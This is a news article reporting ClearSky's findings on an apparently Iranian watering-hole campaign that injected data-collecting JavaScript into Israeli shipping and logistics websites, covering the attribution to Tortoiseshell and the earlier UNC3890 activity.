Based on a research by Tel Aviv-based cybersecurity firm ClearSky, several Israeli shipping and logistics websites were hacked to collect customer data. The business has “low confidence” that the Iranian hackers outfit Tortoiseshell (also known as TA456 and Imperial Kitten) is responsible for these attacks. The malicious actor first appeared in the wild in July of 2018.
At least eight Israeli websites were hit by the hacking campaign, including those of shipping company SNY Cargo, logistics company Depolog, and restaurant equipment supplier SZM. As of Tuesday, April 18th, ClearSky reported that the vast majority of websites had been purged of the malicious code.
As part of a watering hole assault, cybercriminals get access to a website frequented by a target demographic, such as government officials, journalists, or corporate leaders. Once a website has been hacked, malicious code can be injected into it, becoming active whenever a person visits the site.
Researchers at ClearSky found evidence that Iranian hackers had been using watering hole attacks since at least 2017. For instance, in 2018, the Israeli shipping, healthcare, government, and energy industries were all targeted by a suspected Iranian threat actor known as UNC3890.
Hackers recently utilized malicious JavaScript in their attacks. Information such as the user’s IP address, screen resolution, and the URL of the preceding webpage are recorded. ClearSky claimed that the hackers also attempted to identify the user’s preferred computer language in order to tailor future assaults to that language.
The Iranian group Emennet Pasargad attacked the hosting service uPress in 2020, which was used by the majority of the affected websites. Consequently, thousands of Israeli websites were vandalized.
Due to the political animosity between them, Israel and Iran frequently engage in cyber conflict with one another. The Iranian attacks have varying goals, from stealing user data or destroying systems to spreading disinformation.
In two years, the 2 countries have engaged in an increasingly violent cyberwar. According to Microsoft, Iranian state-sponsored entities are improving their cyber capabilities, while being behind Russia and China. To quickly penetrate businesses, for instance, they may take advantage of newly publicized vulnerabilities and employ specialized tools.
In the past, Tortoiseshell has employed a supply chain attack against Saudi IT service providers using both bespoke and commercially available malware to compromise the clients of the targeted service providers.
The current attack was launched from the Tortoiseshell-associated jquery-stack[.]online domain. This website tried to trick visitors by pretending to use the popular jQuery framework written in JavaScript.
In a prior Iranian campaign in 2017, ClearSky analysts observed domain names imitating jQuery via a watering hole attack.
Conclusion
As part of a watering hole attack, at least eight Israeli websites belonging to shipping, logistics, and financial services organizations were hacked. Tortoiseshell, also known as Crimson Sandstorm (formerly known as Curium), Imperial Kitten, and TA456, is an Iranian threat actor tracked by ClearSky, a Tel Aviv-based cybersecurity organization. “The infected sites collect preliminary user information through a script,” ClearSky claimed in a technical study released on Tuesday. The malicious software has been removed from the majority of the affected websites. As of July 2018, Tortoiseshell had already attacked Saudi Arabian IT service providers. It has also been seen attempting to deceive U.S. military veterans into downloading remote access trojans by creating false hiring websites.
However, this is not the first time that Iranian activity clusters have targeted Israeli ports and businesses. This type of assault, also known as strategic website compromises, involves infecting a website that is popular among a specific demographic of Internet users or professionals. In August 2022, a new Iranian actor named UNC3890 was traced to a watering hole installed in the welcome section of a real Israeli cargo company’s website. This watering hole was programmed to send preliminary information about the logged-in user to a domain controlled by the attacker. In the most recent documented intrusions, ClearSky found that malicious JavaScript injected into the websites collected and transmitted system information to an external server.
